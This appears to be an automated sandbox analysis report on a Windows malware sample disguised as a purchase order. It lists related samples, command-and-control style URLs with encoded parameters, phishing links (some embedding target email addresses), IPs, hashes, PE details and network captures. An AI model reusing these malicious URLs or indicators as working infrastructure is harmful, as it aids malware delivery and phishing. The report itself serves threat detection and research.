                                                                        COMMERCIAL INVOICE, BILL OF LADING, DOC.exeGet hashmaliciousBrowse
                                                                        • www.basketdelivered.com/o9b2/?GpaPbN1H=7OzGVZ/w9qx4BfB58pU149PPhqFNbT8gk8tJrAZglrdYXTj2i3q7BPycRLx/F9k/j18K&2dhHV=R2MTzlWXnj
                                                                        7w6Yl263sM.exeGet hashmaliciousBrowse
                                                                        • www.3rddatebykyngsyx.com/bn4/?9rmDvZj=c2Muq4zPTcCBC0LqXiIHasvi02fcKdQIjwSYl/Xgpt6CXdm60GpX8/7SGI/sFKLwtSu4&lZ6l=p2JTBPQPHj4xOHJP
                                                                        Shippingdoc.exeGet hashmaliciousBrowse
                                                                        • www.villadecorazones.com/oj6t/?J2JDYR=Dxox8ho8ARht&afhhAx9=GBhBOFl+UWRPfxznomUTr9M4uaIbOgsfI/ZUh/B3krKPcWLSoAsg43uzpPLYnEUAJ7iD5GNGfQ==
                                                                        194.35.122.226Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • www.fahufu.com/igqu/?1bkpkZ=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJj5U2S4c0Jgx&Bbm4Ad=3f7HcFtPz0f
                                                                        185.201.11.126Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?YnztXrjp=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QKAoZ47NYbcr&sBZxwb=FxlXFP2PHdiD2
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?afo=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&DHU4SX=gbT8543hIhm
                                                                        hjKM0s7CWW.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?-Zlpd2H=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&2d=lneXf
                                                                        9Ul8m9FQ47.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?VR-X4=02JPGJu85hqTpbBp&ETmlgT7=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s
                                                                        n4uladudJS.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?p0D=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QKACGILNcZUr&6l8l=BXeD1
                                                                        T66DUJYHQE.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?sPuDZ26=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJs4FJn2fu16GZQE1w==&MvdT=2d2X
                                                                        NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?v6=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&1b=V6O83JaPw
                                                                        zYUJ3b5gQF.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?1b8hnra=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&OZNPdr=iJEt_DFhGZplHfm0
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?Ezu=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJs4FJn2fu16GZQE1w==&Rzr=M6hL9XnpVlsp
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?8pMta2Q=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&othDaP=eVeHLbk8dP-D
                                                                        sXNQG9jqhR.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?wx=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QKACGILNcZUr&Tj=xpFH
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?IR9D54=3fFxr&Mjq8ijoX=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QKACGILNcZUr
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • www.sweetbasilmarketing.com/igqu/?GPWlMXk=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QKACGILNcZUr&Ano=O2JpLTIpT0jt

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        td-balancer-euw2-6-109.wixdns.netPurchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        Invoice.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        uM0FDMSqE2.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        hjKM0s7CWW.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        n4uladudJS.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        T66DUJYHQE.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        KYC-DOC-11-10.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        f14QUITHh3.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        00d1gI2vB4.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        sXNQG9jqhR.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        SOA109216.exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        P.I..exeGet hashmaliciousBrowse
                                                                        • 35.246.6.109
                                                                        www.realitytvstockwatch.comn4uladudJS.exeGet hashmaliciousBrowse
                                                                        • 103.224.182.242
                                                                        zYUJ3b5gQF.exeGet hashmaliciousBrowse
                                                                        • 103.224.182.242
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • 103.224.182.242
                                                                        prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comPayment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                        • 3.134.22.63
                                                                        udtiZ6qM4s.exeGet hashmaliciousBrowse
                                                                        • 3.12.202.18
                                                                        uM0FDMSqE2.exeGet hashmaliciousBrowse
                                                                        • 3.12.202.18
                                                                        new file.exe.exeGet hashmaliciousBrowse
                                                                        • 3.12.202.18
                                                                        jrzlwOa0UC.exeGet hashmaliciousBrowse
                                                                        • 3.134.22.63
                                                                        9Ul8m9FQ47.exeGet hashmaliciousBrowse
                                                                        • 3.138.72.189
                                                                        XCnhrl4qRO.exeGet hashmaliciousBrowse
                                                                        • 3.12.202.18
                                                                        feJbFA6woA.exeGet hashmaliciousBrowse
                                                                        • 3.138.72.189
                                                                        RfqYEW3Oc5.exeGet hashmaliciousBrowse
                                                                        • 3.138.72.189
                                                                        w4fNtjZBEH.exeGet hashmaliciousBrowse
                                                                        • 3.12.202.18
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • 3.12.202.18
                                                                        sXNQG9jqhR.exeGet hashmaliciousBrowse
                                                                        • 3.12.202.18
                                                                        0VikCnzrVT.exeGet hashmaliciousBrowse
                                                                        • 3.134.22.63
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • 3.138.72.189
                                                                        SOA109216.exeGet hashmaliciousBrowse
                                                                        • 3.134.22.63
                                                                        KZ7qjnBlZF.exeGet hashmaliciousBrowse
                                                                        • 3.134.22.63
                                                                        scnn7676766.exeGet hashmaliciousBrowse
                                                                        • 3.138.72.189
                                                                        PI41006.exeGet hashmaliciousBrowse
                                                                        • 3.18.25.61
                                                                        M11sVPvWUT.exeGet hashmaliciousBrowse
                                                                        • 3.18.25.61
                                                                        Lf15OY5O2G.exeGet hashmaliciousBrowse
                                                                        • 3.18.25.61

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        AMAZON-02UShttps://kimiyasanattools.com/outlook/latest-onedrive/microsoft.phpGet hashmaliciousBrowse
                                                                        • 18.202.27.117
                                                                        https://verify-outlook-web.weebly.com/Get hashmaliciousBrowse
                                                                        • 35.158.107.63
                                                                        https://t.e.vailresorts.com/r/?id=h1bac782d,59eb410,55e61f1&VRI_v73=96008558&cmpid=EML_OPENDAYS_RESO_000_OK_SR_REN1Y_000000_TG0001_20201118_V00_EX001_LOCA_ANN_00000_000Get hashmaliciousBrowse
                                                                        • 54.149.237.46
                                                                        https://www.canva.com/design/DAEN9RlD8Vk/acBvt6UoL-DafjXmQk38pA/view?utm_content=DAEN9RlD8Vk&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousBrowse
                                                                        • 44.236.48.31
                                                                        https://app.box.com/s/mk1t9s05ty9ba7rvsdbstgc46rb4fod7Get hashmaliciousBrowse
                                                                        • 52.16.35.20
                                                                        https://t.e.vailresorts.com/r/?id=hda0e43a,3501a2a,3501f68&VRI_v73=Y25veWVzQDk5cmVzdGF1cmFudHMuY29t&cmpid=EML_SNOWALRT_OTHR_000_NW_00_00000_000000_000000_20200110_v01&p1=www.snow.com%40h-is.xyzGet hashmaliciousBrowse
                                                                        • 52.12.33.145
                                                                        https://go.pardot.com/e/395202/siness-insights-dashboard-html/bnmpz6/1446733421?h=AwLDfNsCVbkjEN13pzY-7AXMPolL_XMigGsJSppGaiMGet hashmaliciousBrowse
                                                                        • 52.16.193.33
                                                                        https://app.box.com/s/gdf36roak3w2fc52cgfbxuq651p0zehyGet hashmaliciousBrowse
                                                                        • 52.16.35.20
                                                                        https://t.e.vailresorts.com/r/?id=hda0e43a,3501a2a,3501f68&VRI_v73=ZGFuaWVsLnBlbm5pbmd0b25AdnZtYy5jb20=&cmpid=EML_SNOWALRT_OTHR_000_NW_00_00000_000000_000000_20200110_v01&p1=www.snow.com%40h-is.xyzGet hashmaliciousBrowse
                                                                        • 35.164.67.102
                                                                        https://app.clio.com/link/AxWtfjmmzhjaGet hashmaliciousBrowse
                                                                        • 13.224.93.53
                                                                        http://WWW.ALYSSA-J-MILANO.COMGet hashmaliciousBrowse
                                                                        • 13.224.93.39
                                                                        http://www.marcusevans.comGet hashmaliciousBrowse
                                                                        • 13.224.103.164
                                                                        http://septterror.tripod.com/the911basics.htmlGet hashmaliciousBrowse
                                                                        • 52.94.225.95
                                                                        https://my.freshbooks.com/#/link/eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzeXN0ZW1pZCI6OTQ3OTM1LCJ1c2VyaWQiOjYzNDYyNywidHlwZSI6Imludm9pY2UiLCJvYmplY3RpZCI6Mjg4MjQ0OSwiZXhwIjoxNjM3MjY5MTgxLCJsZXZlbCI6MH0.DGVcXxdiwtgxTUka4TzPi_o6GS8zH-kvvTnFJZxapLg?companyName=Amanda&invoiceNumber=00007767&ownerEmail=avigilante%40maxburst.com&type=primaryGet hashmaliciousBrowse
                                                                        • 44.236.48.31
                                                                        http://45.95.168.116Get hashmaliciousBrowse
                                                                        • 13.224.89.94
                                                                        https://www.canva.com/design/DAEN3YdYVHw/zaVHWoDx-9G9l20JXWSBtg/view?utm_content=DAEN3YdYVHw&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                        • 13.224.93.92
                                                                        https://download.anydesk.com/AnyDesk.exe?_ga=2.5204531.1823000373.1605785469-1740974547.1605537346Get hashmaliciousBrowse
                                                                        • 54.194.255.175
                                                                        Order specs19.11.20.exeGet hashmaliciousBrowse
                                                                        • 52.58.78.16
                                                                        https://signup.kwikvpn.com/Get hashmaliciousBrowse
                                                                        • 35.181.18.61
                                                                        Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                        • 52.58.78.16
                                                                        AS-HOSTINGERLThttp://blogicstatus.com/images/lnfrr1nZqLHwiP/xLHwHgNkmSZNEOtHDDhWC/XZZmdFFq9Pn2OVvZ/mpORZIoLZZDWswJ/_2BC5JQY1pTVorUMLW/a_2BMIID9/iX4wIfsjiF89Us3qlpsk/tRpR_2FjrcvHjhkdKzg/fbQyPFnFVR6XmGN1MqJ0qM/tU.aviGet hashmaliciousBrowse
                                                                        • 141.136.36.252
                                                                        Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                        • 185.201.11.126
                                                                        0pz1on1.dllGet hashmaliciousBrowse
                                                                        • 195.110.58.42
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • 185.201.11.126
                                                                        KYC_DOC_.EXEGet hashmaliciousBrowse
                                                                        • 194.59.164.170
                                                                        MIT-MULTA5600415258.msiGet hashmaliciousBrowse
                                                                        • 2.57.89.27
                                                                        DEBIT NOTE DB-1130.exeGet hashmaliciousBrowse
                                                                        • 45.13.255.121
                                                                        WOHSFR01BZAC6VP3YOYSGIHL92J4B0XM50RJR34.dllGet hashmaliciousBrowse
                                                                        • 2.57.89.27
                                                                        YewBNZ2jsb.exeGet hashmaliciousBrowse
                                                                        • 212.1.211.44
                                                                        hjKM0s7CWW.exeGet hashmaliciousBrowse
                                                                        • 185.201.11.126
                                                                        9Ul8m9FQ47.exeGet hashmaliciousBrowse
                                                                        • 185.201.11.126
                                                                        n4uladudJS.exeGet hashmaliciousBrowse
                                                                        • 185.201.11.126
                                                                        https://sjsprs.com/tyoiulk/4442/sharepoint-D3/Get hashmaliciousBrowse
                                                                        • 45.87.80.77
                                                                        https://penexchange.azurefd.net/messages/#christina.sullivan@communitybankna.comGet hashmaliciousBrowse
                                                                        • 31.220.17.182
                                                                        fJmovgkDnD.exeGet hashmaliciousBrowse
                                                                        • 212.1.211.44
                                                                        T66DUJYHQE.exeGet hashmaliciousBrowse
                                                                        • 185.201.11.126
                                                                        http://www.kinkgalvannt.ej3kgalvand.vogueaccent.com//#aHR0cHM6Ly9tZWRhbm1hcnQubmV0L2pobi9JSy9vZjE/MDg5ODk5OTg4NTI3MDA5JmVtYWlsPWtnYWx2YW5AZGZ3am9icy5jb20=Get hashmaliciousBrowse
                                                                        • 185.224.138.34
                                                                        NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                        • 185.201.11.126
                                                                        5T4uL3FPj8.exeGet hashmaliciousBrowse
                                                                        • 212.1.211.44
                                                                        g1wEhoios8.exeGet hashmaliciousBrowse
                                                                        • 2.57.89.177
                                                                        DEDIPATH-LLCUSJessFriends.exeGet hashmaliciousBrowse
                                                                        • 193.239.147.116
                                                                        ALPHA_PO_16201844580.exeGet hashmaliciousBrowse
                                                                        • 74.217.182.40
                                                                        https://panoramacharter.xyzGet hashmaliciousBrowse
                                                                        • 91.214.64.2
                                                                        FedEx_Scan21731000921.jarGet hashmaliciousBrowse
                                                                        • 193.239.147.64
                                                                        FedEx_Scan21731000921.jarGet hashmaliciousBrowse
                                                                        • 193.239.147.64
                                                                        Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                        • 194.35.122.226
                                                                        http://45.145.185.25Get hashmaliciousBrowse
                                                                        • 45.145.185.25
                                                                        Sq0uRldDu6.jarGet hashmaliciousBrowse
                                                                        • 193.239.147.64
                                                                        Sq0uRldDu6.jarGet hashmaliciousBrowse
                                                                        • 193.239.147.64
                                                                        Bidvest Order RFQ BV322910098ZA.PDF.gz.exeGet hashmaliciousBrowse
                                                                        • 45.145.185.111
                                                                        TPN Letter of demand.pdf 2.exeGet hashmaliciousBrowse
                                                                        • 45.145.185.111
                                                                        AAPUR2-M.exeGet hashmaliciousBrowse
                                                                        • 92.119.82.212
                                                                        New Puchase Order From BudGroup Ltd .PDF.exeGet hashmaliciousBrowse
                                                                        • 45.145.185.49
                                                                        Autocarriers Overdue invoice.DOC.exeGet hashmaliciousBrowse
                                                                        • 45.145.185.49
                                                                        Security_Check.exeGet hashmaliciousBrowse
                                                                        • 193.239.147.16
                                                                        zKufVDEvon.exeGet hashmaliciousBrowse
                                                                        • 185.200.34.175
                                                                        3bPknPWgeJ.exeGet hashmaliciousBrowse
                                                                        • 185.200.34.175
                                                                        yYW4J4dX9i.exeGet hashmaliciousBrowse
                                                                        • 45.86.70.31
                                                                        x2BhTLV9.exeGet hashmaliciousBrowse
                                                                        • 193.239.147.16
                                                                        scn14092020.exeGet hashmaliciousBrowse
                                                                        • 45.12.112.28

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        No created / dropped files found

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.373704870948321
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:Purchase Order 40,7045$.exe
                                                                        File size:369664
                                                                        MD5:4142c1713da2f4f94bec71bfed46587b
                                                                        SHA1:06cc7bd53758a0936f4b674847411a4f912fd654
                                                                        SHA256:fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
                                                                        SHA512:1693379c66da547efb6e200d5cfc33fe7a49f38ca5f4121690e371ed5e7aaea389363f88cbba68eef1f1c9ea6e8f2d42c3472ebb38f2d9bf2185178bd3f2e245
                                                                        SSDEEP:6144:xOz/xJi4Cnn9y6kyr+23yopaLxx9xKxDVFBqyaLv0Yd5bMceMau:xODxE7nnE6NrLqxxfQJFBqyEvF5yMau
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.uHr.uHr.uH...Hp.uH...Ha.uH...HD.uH...H..uH{..Ha.uHr.tH..uH...Hs.uH...Hs.uH...Hs.uHRichr.uH........................PE..L..

                                                                        File Icon

                                                                        Icon Hash:34ecc4d0f0e8ccd4

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x40c753
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x5FB69F90 [Thu Nov 19 16:38:40 2020 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:1
                                                                        File Version Major:5
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:ab2865aeb9fd256a577a2832dd6a376d

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        call 00007F93F094583Dh
                                                                        jmp 00007F93F093B8CEh
                                                                        push dword ptr [0042D608h]
                                                                        call dword ptr [0041F0A4h]
                                                                        test eax, eax
                                                                        je 00007F93F093BA44h
                                                                        call eax
                                                                        push 00000019h
                                                                        call 00007F93F0945101h
                                                                        push 00000001h
                                                                        push 00000000h
                                                                        call 00007F93F093F1B0h
                                                                        add esp, 0Ch
                                                                        jmp 00007F93F093F175h
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        mov ecx, dword ptr [esp+04h]
                                                                        test ecx, 00000003h
                                                                        je 00007F93F093BA66h
                                                                        mov al, byte ptr [ecx]
                                                                        add ecx, 01h
                                                                        test al, al
                                                                        je 00007F93F093BA90h
                                                                        test ecx, 00000003h
                                                                        jne 00007F93F093BA31h
                                                                        add eax, 00000000h
                                                                        lea esp, dword ptr [esp+00000000h]
                                                                        lea esp, dword ptr [esp+00000000h]
                                                                        mov eax, dword ptr [ecx]
                                                                        mov edx, 7EFEFEFFh
                                                                        add edx, eax
                                                                        xor eax, FFFFFFFFh
                                                                        xor eax, edx
                                                                        add ecx, 04h
                                                                        test eax, 81010100h
                                                                        je 00007F93F093BA2Ah
                                                                        mov eax, dword ptr [ecx-04h]
                                                                        test al, al
                                                                        je 00007F93F093BA74h
                                                                        test ah, ah
                                                                        je 00007F93F093BA66h
                                                                        test eax, 00FF0000h
                                                                        je 00007F93F093BA55h
                                                                        test eax, FF000000h
                                                                        je 00007F93F093BA44h
                                                                        jmp 00007F93F093BA0Fh
                                                                        lea eax, dword ptr [ecx-01h]
                                                                        mov ecx, dword ptr [esp+04h]
                                                                        sub eax, ecx
                                                                        ret
                                                                        lea eax, dword ptr [ecx-02h]
                                                                        mov ecx, dword ptr [esp+04h]
                                                                        sub eax, ecx
                                                                        ret
                                                                        lea eax, dword ptr [ecx-03h]
                                                                        mov ecx, dword ptr [esp+04h]
                                                                        sub eax, ecx
                                                                        ret
                                                                        lea eax, dword ptr [ecx-04h]
                                                                        mov ecx, dword ptr [esp+04h]
                                                                        sub eax, ecx

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [LNK] VS2010 build 30319
                                                                        • [ASM] VS2010 build 30319
                                                                        • [ C ] VS2010 build 30319
                                                                        • [C++] VS2010 build 30319
                                                                        • [RES] VS2010 build 30319
                                                                        • [IMP] VS2008 SP1 build 30729

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x290080xc8.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000x42e0.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x213c.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x1f0000x1f4.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x1d12e0x1d200False0.534276086373data6.54668663912IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x1f0000xaa9e0xac00False0.383698219477data5.48251502126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x2a0000x53a40x3400False0.680588942308data6.53378088611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x300000x42e00x4400False0.0522173713235data2.29893765685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x350000x2b5a0x2c00False0.593306107955data5.76069468977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_ICON0x300a00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4294967040EnglishUnited States
                                                                        RT_GROUP_ICON0x342c80x14dataEnglishUnited States

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllEnumTimeFormatsA, GetProcAddress, LoadLibraryA, VirtualProtect, SetConsoleMode, ReadConsoleInputA, GetProcessHeap, SetEndOfFile, SetEnvironmentVariableA, CompareStringW, CreateFileW, CreateFileA, CreateProcessA, WaitForSingleObject, GetExitCodeProcess, WriteConsoleW, SetStdHandle, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, HeapReAlloc, GetStringTypeW, HeapSize, IsProcessorFeaturePresent, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, HeapCreate, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, GetLocaleInfoW, LoadLibraryW, CloseHandle, ReadFile, GetCurrentThreadId, SetLastError, InterlockedIncrement, InterlockedDecrement, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, DeleteFileA, GetSystemTimeAsFileTime, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapFree, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetFileAttributesA, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree
                                                                        wsnmp32.dll
                                                                        WINSPOOL.DRVPrinterProperties, AddPortW, DeleteFormA, AddPrinterDriverW
                                                                        OLEAUT32.dllVarI4FromCy, OleCreatePropertyFrame, VarBstrFromDisp, QueryPathOfRegTypeLib
                                                                        SHELL32.dllSHGetPathFromIDList, ExtractIconExA
                                                                        ODBC32.dll
                                                                        WS2_32.dllWSACreateEvent, WSASetServiceW, WSAGetLastError, WSACleanup
                                                                        RESUTILS.dllResUtilGetDwordValue, ResUtilVerifyResourceService, ResUtilFindSzProperty, ResUtilGetMultiSzProperty
                                                                        WINMM.dllmidiInReset, midiOutOpen, waveOutUnprepareHeader, midiInAddBuffer

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        11/20/20-11:07:38.645275ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                                                        11/20/20-11:08:16.486833TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.7

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 20, 2020 11:07:15.679258108 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:15.932034969 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:15.932176113 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:15.932311058 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.187412977 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.187463999 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.187644005 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.440414906 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.440454006 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.440473080 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.440496922 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.440556049 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.440637112 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.440646887 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.440651894 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.444058895 CET4973480192.168.2.7154.86.218.70
                                                                        Nov 20, 2020 11:07:16.693258047 CET8049734154.86.218.70192.168.2.7
                                                                        Nov 20, 2020 11:07:16.693357944 CET8049734154.86.218.70192.168.2.7
